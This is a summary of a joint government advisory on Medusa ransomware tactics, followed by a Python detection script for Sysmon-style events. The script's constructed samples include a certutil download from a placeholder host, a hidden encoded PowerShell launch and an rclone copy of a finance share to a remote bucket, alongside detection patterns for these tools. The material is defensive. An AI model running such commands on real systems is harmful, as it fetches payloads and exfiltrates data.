The FBI, CISA, and MS-ISAC have released a joint advisory to disseminate known Medusa ransomware tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs). Medusa is a ransomware-as-a-service (RaaS) variant first identified in June 2021, and as of February 2025 it has impacted over 300 victims across various critical infrastructure sectors. Medusa actors employ a double extortion model: they encrypt victim data and threaten to publicly release exfiltrated data if a ransom is not paid.

The actors typically recruit initial access brokers (IABs) to obtain initial access to potential victims, often through phishing campaigns and exploitation of unpatched software vulnerabilities. Once a foothold is established, Medusa actors use living off the land (LOTL) techniques and legitimate tools for initial user, system, and network enumeration. They also use PowerShell and the Windows Command Prompt for network and filesystem enumeration and for ingress tool transfer. Medusa actors attempt to avoid detection through various evasion techniques, including ones that rely on certutil and PowerShell. The actors have also been observed using legitimate remote access software to move laterally through the network and to identify files for exfiltration and encryption. Finally, Medusa actors use Rclone to exfiltrate data to their C2 servers and then demand payment from victims under the double extortion model described above.
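The LOTL, evasion, and exfiltration tooling the advisory names (certutil, PowerShell, Rclone) can be surfaced from process-creation telemetry. The following is an added detection example, not code from the advisory or from CISA; it assumes Sysmon-style event fields (Image, CommandLine), uses constructed sample events, and matches the tools' documented option names rather than anything stated on this page.

```python
"""Flag process-creation events matching the Medusa TTPs named in the advisory.

Constructed example: event fields mimic Sysmon Event ID 1 (Image, CommandLine);
the sample events below are made up for illustration, not real telemetry.
"""
import json
import re

# Each rule: (label, predicate over (image, commandline)). The options checked
# (certutil -urlcache/-decode, powershell -EncodedCommand, rclone copy/sync/move)
# are documented options of those tools, not taken from the advisory text.
RULES = [
    ("certutil_ingress_or_decode",
     lambda img, cmd: img.endswith("certutil.exe")
     and re.search(r"-(urlcache|decode)\b", cmd, re.I) is not None),
    ("powershell_encoded_command",
     lambda img, cmd: img.endswith("powershell.exe")
     and re.search(r"\s-(e|ec|enc|encodedcommand)\s", cmd, re.I) is not None),
    ("rclone_exfil",
     lambda img, cmd: img.endswith("rclone.exe")
     and re.search(r"\b(copy|sync|move)\b", cmd, re.I) is not None),
]

def evaluate(events):
    """Return a list of (label, image, commandline) hits across the events."""
    hits = []
    for ev in events:
        img = ev.get("Image", "").lower()
        cmd = ev.get("CommandLine", "")
        for label, pred in RULES:
            if pred(img, cmd):
                hits.append((label, img, cmd))
    return hits

# Constructed sample events (hypothetical paths, TEST-NET address, placeholder blob).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil -urlcache -split -f http://203.0.113.10/a.txt a.txt"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -nop -w hidden -enc BASE64_PLACEHOLDER "},
    {"Image": r"C:\Tools\rclone.exe",
     "CommandLine": "rclone copy D:\\Shares\\Finance remote:bucket"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil -verify cert.cer"},   # benign use, must not fire
]

if __name__ == "__main__":
    for label, img, cmd in evaluate(SAMPLE_EVENTS):
        print(json.dumps({"rule": label, "image": img, "cmd": cmd}))
```

Rules like these are a triage starting point: certutil and PowerShell have many legitimate uses, so tune them against baseline activity and correlate with parent process and user context before alerting.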
cisa.gov